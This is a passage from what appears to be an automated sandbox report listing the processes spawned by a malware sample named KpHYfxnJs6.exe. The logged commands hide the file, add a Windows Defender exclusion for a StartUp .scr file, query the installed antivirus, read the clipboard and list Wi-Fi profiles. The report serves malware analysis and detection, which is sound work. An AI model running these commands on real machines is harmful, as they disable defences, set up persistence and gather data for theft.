                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                                              Start time:01:19:25
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                                                              Start time:01:19:25
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                                                                                                                                                                                              Imagebase:0xf0000
                                                                                                                                                                                                                              File size:59'392 bytes
                                                                                                                                                                                                                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                                              Start time:01:19:25
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                              Start time:01:19:25
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                              Start time:01:19:26
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                              Imagebase:0xf90000
                                                                                                                                                                                                                              File size:427'008 bytes
                                                                                                                                                                                                                              MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                                              Start time:01:19:27
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                              Start time:01:19:27
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                                              Start time:01:19:27
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                              Imagebase:0xf90000
                                                                                                                                                                                                                              File size:427'008 bytes
                                                                                                                                                                                                                              MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                                              Start time:01:19:29
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\KpHYfxnJs6.exe""
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                                              Start time:01:19:29
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                                              Start time:01:19:29
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                                                              Start time:01:19:29
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                                                              Start time:01:19:29
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:attrib +h +s "C:\Users\user\Desktop\KpHYfxnJs6.exe"
                                                                                                                                                                                                                              Imagebase:0xb0000
                                                                                                                                                                                                                              File size:19'456 bytes
                                                                                                                                                                                                                              MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                                              Start time:01:19:30
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'
                                                                                                                                                                                                                              Imagebase:0x340000
                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:41
                                                                                                                                                                                                                              Start time:01:19:31
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:42
                                                                                                                                                                                                                              Start time:01:19:31
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:43
                                                                                                                                                                                                                              Start time:01:19:31
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:44
                                                                                                                                                                                                                              Start time:01:19:31
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:45
                                                                                                                                                                                                                              Start time:01:19:31
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:46
                                                                                                                                                                                                                              Start time:01:19:31
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:47
                                                                                                                                                                                                                              Start time:01:19:31
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                                                                              Imagebase:0xb00000
                                                                                                                                                                                                                              File size:79'360 bytes
                                                                                                                                                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:48
                                                                                                                                                                                                                              Start time:01:19:31
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:49
                                                                                                                                                                                                                              Start time:01:19:31
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:50
                                                                                                                                                                                                                              Start time:01:19:32
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:51
                                                                                                                                                                                                                              Start time:01:19:32
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                                                                              Imagebase:0xb00000
                                                                                                                                                                                                                              File size:79'360 bytes
                                                                                                                                                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:52
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                              Imagebase:0xf90000
                                                                                                                                                                                                                              File size:427'008 bytes
                                                                                                                                                                                                                              MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:53
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:54
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:55
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:56
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:57
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:58
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:59
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tree.com
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                              Imagebase:0x8e0000
                                                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                                                              MD5 hash:7E896B29B309DE74A72DEC7D59715EFD
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:60
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:61
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:powershell Get-Clipboard
                                                                                                                                                                                                                              Imagebase:0x340000
                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:62
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                                                                              Imagebase:0xb00000
                                                                                                                                                                                                                              File size:79'360 bytes
                                                                                                                                                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:63
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:netsh wlan show profile
